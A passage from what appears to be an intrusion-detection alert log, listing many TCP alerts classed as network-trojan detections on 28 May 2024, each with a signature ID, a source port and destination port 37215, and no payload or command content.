          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941698
          SID:2835222
          Source Port:48808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300037
          SID:2829579
          Source Port:36384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113070
          SID:2829579
          Source Port:58560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328746
          SID:2829579
          Source Port:57338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722411
          SID:2835222
          Source Port:48548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462493
          SID:2835222
          Source Port:54220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766720
          SID:2829579
          Source Port:50318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728772
          SID:2835222
          Source Port:40264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805351
          SID:2835222
          Source Port:49010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325839
          SID:2835222
          Source Port:48780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214447
          SID:2829579
          Source Port:56124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807954
          SID:2829579
          Source Port:48088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424458
          SID:2835222
          Source Port:50546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838686
          SID:2835222
          Source Port:40010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597366
          SID:2829579
          Source Port:55694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474301
          SID:2835222
          Source Port:34418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475546
          SID:2829579
          Source Port:40882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271380
          SID:2829579
          Source Port:51688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426618
          SID:2829579
          Source Port:43206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291687
          SID:2829579
          Source Port:52272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764461
          SID:2829579
          Source Port:46316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.225472
          SID:2829579
          Source Port:47988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302770
          SID:2829579
          Source Port:59778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161938
          SID:2829579
          Source Port:53072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944917
          SID:2835222
          Source Port:44996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272339
          SID:2829579
          Source Port:51564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033289
          SID:2835222
          Source Port:56868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.416838
          SID:2829579
          Source Port:59924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.366055
          SID:2829579
          Source Port:46064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216283
          SID:2835222
          Source Port:43044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536739
          SID:2829579
          Source Port:53536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268779
          SID:2829579
          Source Port:56316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923488
          SID:2835222
          Source Port:39380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588649
          SID:2829579
          Source Port:48018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594681
          SID:2835222
          Source Port:46738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.721837
          SID:2835222
          Source Port:53300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782983
          SID:2829579
          Source Port:59564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.771033
          SID:2835222
          Source Port:33434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973988
          SID:2835222
          Source Port:34508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.292965
          SID:2835222
          Source Port:44598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985224
          SID:2835222
          Source Port:41338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939463
          SID:2835222
          Source Port:54096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229880
          SID:2829579
          Source Port:58752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543055
          SID:2835222
          Source Port:40580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923663
          SID:2829579
          Source Port:47872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061275
          SID:2835222
          Source Port:37684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496682
          SID:2835222
          Source Port:44952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327824
          SID:2829579
          Source Port:35658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590957
          SID:2835222
          Source Port:35368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177948
          SID:2835222
          Source Port:36412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291787
          SID:2829579
          Source Port:53524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135917
          SID:2835222
          Source Port:41492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152504
          SID:2835222
          Source Port:43112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864166
          SID:2835222
          Source Port:59354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.981512
          SID:2829579
          Source Port:49050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267267
          SID:2835222
          Source Port:45260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.627675
          SID:2835222
          Source Port:54392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666641
          SID:2835222
          Source Port:37468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562742
          SID:2835222
          Source Port:48824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923528
          SID:2829579
          Source Port:55276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651175
          SID:2835222
          Source Port:58066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.853346
          SID:2829579
          Source Port:33824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878673
          SID:2829579
          Source Port:38938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923495
          SID:2829579
          Source Port:34718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667652
          SID:2829579
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.242662
          SID:2835222
          Source Port:41972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300993
          SID:2829579
          Source Port:39566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542385
          SID:2835222
          Source Port:54146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709323
          SID:2835222
          Source Port:51408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223516
          SID:2829579
          Source Port:57630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039659
          SID:2829579
          Source Port:55486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240256
          SID:2829579
          Source Port:41100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214695
          SID:2835222
          Source Port:56912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155630
          SID:2835222
          Source Port:55640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485630
          SID:2835222
          Source Port:39668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.894009
          SID:2835222
          Source Port:49096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797366
          SID:2829579
          Source Port:32804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095859
          SID:2829579
          Source Port:50336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893832
          SID:2829579
          Source Port:57482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922934
          SID:2829579
          Source Port:51838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804103
          SID:2829579
          Source Port:55686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652331
          SID:2835222
          Source Port:36646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543931
          SID:2829579
          Source Port:43088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.298040
          SID:2829579
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115552
          SID:2829579
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482627
          SID:2829579
          Source Port:60930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177180
          SID:2835222
          Source Port:50118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299991
          SID:2829579
          Source Port:44966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963341
          SID:2829579
          Source Port:41000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299526
          SID:2829579
          Source Port:40310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229905
          SID:2835222
          Source Port:38780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114131
          SID:2835222
          Source Port:52230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066198
          SID:2835222
          Source Port:38050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709180
          SID:2835222
          Source Port:46326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755711
          SID:2829579
          Source Port:39140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.435604
          SID:2835222
          Source Port:37538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941462
          SID:2835222
          Source Port:56346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527735
          SID:2829579
          Source Port:42824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562796
          SID:2835222
          Source Port:57814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809840
          SID:2835222
          Source Port:34114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068156
          SID:2835222
          Source Port:41720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923190
          SID:2829579
          Source Port:35958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.634214
          SID:2835222
          Source Port:59710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557626
          SID:2835222
          Source Port:43570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102355
          SID:2829579
          Source Port:35122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117089
          SID:2829579
          Source Port:60322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.945501
          SID:2835222
          Source Port:57028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.224257
          SID:2835222
          Source Port:37094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922239
          SID:2835222
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487040
          SID:2829579
          Source Port:60210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267394
          SID:2829579
          Source Port:52278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953909
          SID:2829579
          Source Port:40724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711376
          SID:2835222
          Source Port:56090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294670
          SID:2835222
          Source Port:59414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547966
          SID:2829579
          Source Port:52186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685508
          SID:2829579
          Source Port:44404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.038553
          SID:2829579
          Source Port:57192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465333
          SID:2835222
          Source Port:59480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529946
          SID:2835222
          Source Port:36534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.723795
          SID:2835222
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989591
          SID:2829579
          Source Port:39516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809470
          SID:2835222
          Source Port:56168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485706
          SID:2835222
          Source Port:50488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157045
          SID:2829579
          Source Port:36530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553961
          SID:2829579
          Source Port:45968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117224
          SID:2829579
          Source Port:49612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.359080
          SID:2835222
          Source Port:50810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764545
          SID:2829579
          Source Port:38350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635096
          SID:2835222
          Source Port:46848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213711
          SID:2829579
          Source Port:36744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.246155
          SID:2835222
          Source Port:44374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592543
          SID:2835222
          Source Port:44700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277050
          SID:2829579
          Source Port:44636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949883
          SID:2835222
          Source Port:57898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.340989
          SID:2835222
          Source Port:56732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222400
          SID:2835222
          Source Port:49120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.032998
          SID:2835222
          Source Port:42528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729155
          SID:2835222
          Source Port:45056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213272
          SID:2835222
          Source Port:51448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625763
          SID:2835222
          Source Port:42712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935090
          SID:2835222
          Source Port:55488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271918
          SID:2835222
          Source Port:43492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042047
          SID:2835222
          Source Port:36802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272918
          SID:2835222
          Source Port:50138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488637
          SID:2829579
          Source Port:33618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548040
          SID:2835222
          Source Port:33150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780392
          SID:2835222
          Source Port:44868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977931
          SID:2835222
          Source Port:42896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242153
          SID:2829579
          Source Port:58770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300469
          SID:2829579
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891894
          SID:2835222
          Source Port:35394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473906
          SID:2829579
          Source Port:60486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887487
          SID:2835222
          Source Port:37242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.367122
          SID:2835222
          Source Port:48886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164905
          SID:2829579
          Source Port:42334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756526
          SID:2829579
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463978
          SID:2829579
          Source Port:58240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369094
          SID:2835222
          Source Port:55876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361397
          SID:2829579
          Source Port:42808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176635
          SID:2835222
          Source Port:43996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156079
          SID:2829579
          Source Port:41676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965160
          SID:2829579
          Source Port:35854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474658
          SID:2835222
          Source Port:60768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598657
          SID:2829579
          Source Port:35250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195286
          SID:2829579
          Source Port:54746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592164
          SID:2835222
          Source Port:38414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268712
          SID:2835222
          Source Port:42798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922073
          SID:2829579
          Source Port:55998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922518
          SID:2835222
          Source Port:43448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281433
          SID:2829579
          Source Port:52628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153412
          SID:2829579
          Source Port:36440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964377
          SID:2829579
          Source Port:33616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590581
          SID:2829579
          Source Port:38588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770725
          SID:2835222
          Source Port:36834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730331
          SID:2829579
          Source Port:59190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741681
          SID:2835222
          Source Port:43356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635601
          SID:2835222
          Source Port:38444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093700
          SID:2829579
          Source Port:44316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481338
          SID:2829579
          Source Port:58772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728019
          SID:2829579
          Source Port:45464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230227
          SID:2835222
          Source Port:59192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978344
          SID:2829579
          Source Port:40032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269269
          SID:2835222
          Source Port:42594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.687446
          SID:2829579
          Source Port:51966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538932
          SID:2835222
          Source Port:49828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932760
          SID:2829579
          Source Port:56506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.633421
          SID:2829579
          Source Port:51530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.238998
          SID:2835222
          Source Port:45434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544106
          SID:2835222
          Source Port:59630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163833
          SID:2835222
          Source Port:42980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157563
          SID:2835222
          Source Port:35298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352530
          SID:2835222
          Source Port:56768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667826
          SID:2835222
          Source Port:33484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322740
          SID:2835222
          Source Port:40208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051214
          SID:2835222
          Source Port:34416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271688
          SID:2835222
          Source Port:57104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732192
          SID:2829579
          Source Port:51634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
